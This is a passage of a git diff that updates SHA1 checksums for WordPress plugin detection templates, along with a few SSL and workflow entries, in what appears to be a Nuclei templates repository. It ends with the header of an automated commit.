-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:36c8dafa668cca638bf855cf22db851e04568b22 +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6578,7 +6579,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:f8519e525e52310bb205374c459cb94ddf592b1c +templates-checksum.txt:fae14432022aff6f4fa598ba32fda82847bec326 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 08f5fac34943bf3b1ced48114ecaac6783f9419e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 07:00:12 +0000 Subject: [PATCH 561/609] Auto Generated New Template Addition List [Mon Jul 10 07:00:12 UTC 